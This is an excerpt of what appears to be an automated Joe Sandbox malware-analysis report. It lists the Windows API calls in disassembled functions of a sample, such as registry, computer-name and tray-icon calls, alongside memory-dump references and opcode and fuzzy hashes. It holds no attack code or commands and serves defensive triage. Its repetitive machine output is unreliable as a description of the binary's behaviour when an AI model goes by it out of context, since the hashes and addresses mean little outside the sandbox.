                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                • String ID: GetSystemWow64DirectoryW$X64
                                                                                                                                                                                                                                                                • API String ID: 145871493-2590602151
                                                                                                                                                                                                                                                                • Opcode ID: 8950039e35c9f16d28b87ac302ef9f5229221ac5049a0e669f68d4287c855011
                                                                                                                                                                                                                                                                • Instruction ID: f6fc4af9b3735fdc9e7210f7232293c5cb90952285cf3d4d2df28ecd9c4f11d1
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8950039e35c9f16d28b87ac302ef9f5229221ac5049a0e669f68d4287c855011
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ECF020B0801620DBD7362B108C18FBAB213EF12701F64837CE90AE1290DB28CE418692

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 2424 673b1c-673b27 2425 673b99-673b9b 2424->2425 2426 673b29-673b2e 2424->2426 2428 673b8c-673b8f 2425->2428 2426->2425 2427 673b30-673b48 RegOpenKeyExW 2426->2427 2427->2425 2429 673b4a-673b69 RegQueryValueExW 2427->2429 2430 673b80-673b8b RegCloseKey 2429->2430 2431 673b6b-673b76 2429->2431 2430->2428 2432 673b90-673b97 2431->2432 2433 673b78-673b7a 2431->2433 2434 673b7e 2432->2434 2433->2434 2434->2430
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00673B0F,SwapMouseButtons,00000004,?), ref: 00673B40
                                                                                                                                                                                                                                                                • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00673B0F,SwapMouseButtons,00000004,?), ref: 00673B61
                                                                                                                                                                                                                                                                • RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,00673B0F,SwapMouseButtons,00000004,?), ref: 00673B83
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                                                • String ID: Control Panel\Mouse
                                                                                                                                                                                                                                                                • API String ID: 3677997916-824357125
                                                                                                                                                                                                                                                                • Opcode ID: 4e6e540956636cb99ac5f71540a9b5987a977727d209660e6d2ba9b37d36ab44
                                                                                                                                                                                                                                                                • Instruction ID: 63cc692715799ec3a825e3731a91e814e915e9b7117598a3362f87abc2a5678a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4e6e540956636cb99ac5f71540a9b5987a977727d209660e6d2ba9b37d36ab44
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B0112AB5510218FFDB218FA5DC44AEEB7BDEF24B44B10855AA809D7210E6319E40A7A4
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 006B33A2
                                                                                                                                                                                                                                                                  • Part of subcall function 00676B57: _wcslen.LIBCMT ref: 00676B6A
                                                                                                                                                                                                                                                                • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00673A04
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: IconLoadNotifyShell_String_wcslen
                                                                                                                                                                                                                                                                • String ID: Line:
                                                                                                                                                                                                                                                                • API String ID: 2289894680-1585850449
                                                                                                                                                                                                                                                                • Opcode ID: c37b288d0d3f25af4309c05db1e4b8cf55e0be4230b78e7d9c6c511e89f7667a
                                                                                                                                                                                                                                                                • Instruction ID: 83312c4221b95f5740342c8d133f538cc439f169ad144c62c2efdf06ec497d22
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c37b288d0d3f25af4309c05db1e4b8cf55e0be4230b78e7d9c6c511e89f7667a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B631C571508320AEC761EF20DC45BEBB7D9AB41710F00861EF59D83291EF749689C7CA
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetOpenFileNameW.COMDLG32(?), ref: 006B2C8C
                                                                                                                                                                                                                                                                  • Part of subcall function 00673AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00673A97,?,?,00672E7F,?,?,?,00000000), ref: 00673AC2
                                                                                                                                                                                                                                                                  • Part of subcall function 00672DA5: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00672DC4
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Name$Path$FileFullLongOpen
                                                                                                                                                                                                                                                                • String ID: X$`es
                                                                                                                                                                                                                                                                • API String ID: 779396738-2017476410
                                                                                                                                                                                                                                                                • Opcode ID: 7f415214d1fdfe20ddb54de6ef1af4044109497a86244d0dd15b78539aa09db5
                                                                                                                                                                                                                                                                • Instruction ID: 22641b3b94c096829976899d882e4851b7d74dafa1fb4b59e36962290dc510ba
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7f415214d1fdfe20ddb54de6ef1af4044109497a86244d0dd15b78539aa09db5
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D4219671A00258ABDB41DF94C8557EE7BFDAF49304F00C05DE509A7241DBB85A898B65
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00690668
                                                                                                                                                                                                                                                                  • Part of subcall function 006932A4: RaiseException.KERNEL32(?,?,?,0069068A,?,00741444,?,?,?,?,?,?,0069068A,00671129,00738738,00671129), ref: 00693304
                                                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00690685
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                                                                                                                                • String ID: Unknown exception
                                                                                                                                                                                                                                                                • API String ID: 3476068407-410509341
                                                                                                                                                                                                                                                                • Opcode ID: 4e7647e8e13965fbf1adcc5281628125e9508944d719f582f2e4ea6ffa0d03ee
                                                                                                                                                                                                                                                                • Instruction ID: eb83d81bafdd1d4a15241a2dda63b58229d6142cb350c08d601f427f45cfe890
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4e7647e8e13965fbf1adcc5281628125e9508944d719f582f2e4ea6ffa0d03ee
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 42F04F34900209ABDF40B7A4D846C9E776E5E40350B604639B924D6ED2EF71EB66C685
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: LocalTime
                                                                                                                                                                                                                                                                • String ID: %.3d$X64
                                                                                                                                                                                                                                                                • API String ID: 481472006-1077770165
                                                                                                                                                                                                                                                                • Opcode ID: b10101e022b303dd3df20ad27e5c0d8e3a4548e7513fb8b96beda8a34b2a9894
                                                                                                                                                                                                                                                                • Instruction ID: 59b78aff741de97555ee5f93eef72ec09cebcbcf80b70c40d54288efb41f7648
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b10101e022b303dd3df20ad27e5c0d8e3a4548e7513fb8b96beda8a34b2a9894
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A8D012A1C08108E9CB90A7D0CC45EBAB3BDFB09301F50857AFA0692040D63CC64AAB61
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00671BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00671BF4
                                                                                                                                                                                                                                                                  • Part of subcall function 00671BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00671BFC
                                                                                                                                                                                                                                                                  • Part of subcall function 00671BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00671C07
                                                                                                                                                                                                                                                                  • Part of subcall function 00671BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00671C12
                                                                                                                                                                                                                                                                  • Part of subcall function 00671BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00671C1A
                                                                                                                                                                                                                                                                  • Part of subcall function 00671BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00671C22
                                                                                                                                                                                                                                                                  • Part of subcall function 00671B4A: RegisterWindowMessageW.USER32(00000004,?,006712C4), ref: 00671BA2
                                                                                                                                                                                                                                                                • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0067136A
                                                                                                                                                                                                                                                                • OleInitialize.OLE32 ref: 00671388
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,00000000), ref: 006B24AB
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1986988660-0
                                                                                                                                                                                                                                                                • Opcode ID: 418a5bb902c56def179d5bbe8d1b8c1e2966b4119035184b59e09f2f4651a9d2
                                                                                                                                                                                                                                                                • Instruction ID: ded2b8aa272b74e8623566e161bea691a6512e7fec3cf752715b414cf8d52652
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 418a5bb902c56def179d5bbe8d1b8c1e2966b4119035184b59e09f2f4651a9d2
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 887199B89112408FC384FF79E845695BAE5AB8A394395C22FD51ACB261EB3C44E0CF5D
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00673923: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00673A04
                                                                                                                                                                                                                                                                • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 006DC259
                                                                                                                                                                                                                                                                • KillTimer.USER32(?,00000001,?,?), ref: 006DC261
                                                                                                                                                                                                                                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 006DC270
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: IconNotifyShell_Timer$Kill
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3500052701-0
                                                                                                                                                                                                                                                                • Opcode ID: 2b82241475eafa98fde9b8f44fefaa82244c9e75cc97d594d041ac6538847971
                                                                                                                                                                                                                                                                • Instruction ID: a4b5d0e74b576f81b2dbcf0d52354b4e6c6fe54a83268a7c65ce660034a5538a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2b82241475eafa98fde9b8f44fefaa82244c9e75cc97d594d041ac6538847971
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AE31E370D00348AFEB329F648895BE7BBEDAB02314F00409EE2DA93341C7745A85CB55
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,00000000,?,?,006A85CC,?,00738CC8,0000000C), ref: 006A8704
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,006A85CC,?,00738CC8,0000000C), ref: 006A870E
                                                                                                                                                                                                                                                                • __dosmaperr.LIBCMT ref: 006A8739
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2583163307-0
                                                                                                                                                                                                                                                                • Opcode ID: 51d0aa4760f447e1d1072ccbf1286092fe14ba8e9f465c05b37445c277b3bc82
                                                                                                                                                                                                                                                                • Instruction ID: b8f48747e1b706b225df81947c9e5eccbe475c019a622d0c0f47537b99e501ea
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 51d0aa4760f447e1d1072ccbf1286092fe14ba8e9f465c05b37445c277b3bc82
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6B0148326046202EEAA0B3346845BAE674B4BC3774F39121DE8058B2D2EEA4DC818998
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • TranslateMessage.USER32(?), ref: 0067DB7B
                                                                                                                                                                                                                                                                • DispatchMessageW.USER32(?), ref: 0067DB89
                                                                                                                                                                                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0067DB9F
                                                                                                                                                                                                                                                                • Sleep.KERNEL32(0000000A), ref: 0067DBB1
                                                                                                                                                                                                                                                                • TranslateAcceleratorW.USER32(?,?,?), ref: 006C1CC9
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Message$Translate$AcceleratorDispatchPeekSleep
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3288985973-0
                                                                                                                                                                                                                                                                • Opcode ID: 1959d3d4473a5c9a50bafa81b215815a8c95c8c40f8cb6589389672888aacbec
                                                                                                                                                                                                                                                                • Instruction ID: ae2f2fddd2258be9dffaa327468a27827b1aa5a6bf7d2f9b737de702dbde35dc
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1959d3d4473a5c9a50bafa81b215815a8c95c8c40f8cb6589389672888aacbec
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1EF05E30644340DBE730DB608C49FEA73BEEF46710F508B19F61A971C0DB78A4888B19
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • __Init_thread_footer.LIBCMT ref: 006817F6
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                • String ID: CALL
                                                                                                                                                                                                                                                                • API String ID: 1385522511-4196123274
                                                                                                                                                                                                                                                                • Opcode ID: 348b2fe02bea70b669239ada49e3ede840c99ab5cebe53b36799d0dab9f95ea1
                                                                                                                                                                                                                                                                • Instruction ID: 4012f82fe222443142145800400a607e27eb518336bb1fca6f994464abb7b76c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 348b2fe02bea70b669239ada49e3ede840c99ab5cebe53b36799d0dab9f95ea1
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5B229CB06082419FC714EF14C484B6ABBF6FF86314F248A6DF49A8B361D771E942CB56
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 50e160fafcd2e54fbc96435f451afbe8cacfb79eb4adf3075747dde015007ec4
                                                                                                                                                                                                                                                                • Instruction ID: e8648fbb997001993263d0e1e2024ffd8670982c679055b86d64d12411be75c0
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 50e160fafcd2e54fbc96435f451afbe8cacfb79eb4adf3075747dde015007ec4
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3532CE30A00605DFDB64EF54CC95FBEB3A2EF04310F148A6DE9169B3A1D771AA84CB95
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetComputerNameW.KERNEL32(?,?), ref: 006CD375
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ComputerName
                                                                                                                                                                                                                                                                • String ID: X64
                                                                                                                                                                                                                                                                • API String ID: 3545744682-893830106
                                                                                                                                                                                                                                                                • Opcode ID: 40b32acd5430772f58b29b689ce7ade873e4d1778ec06ff6a19ea34edafb2a46
                                                                                                                                                                                                                                                                • Instruction ID: f756359536f3856e536521d7eba97abb5e66330f3db9f8a3452991ec15dd9baf
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 40b32acd5430772f58b29b689ce7ade873e4d1778ec06ff6a19ea34edafb2a46
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9ED0C9B5815118EACB94DB40DC88EEAF37DFB04301F608265F106E2040DB38964A9B21
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00673908
                                                                                                                                                                                                                                                                Memory Dump Source
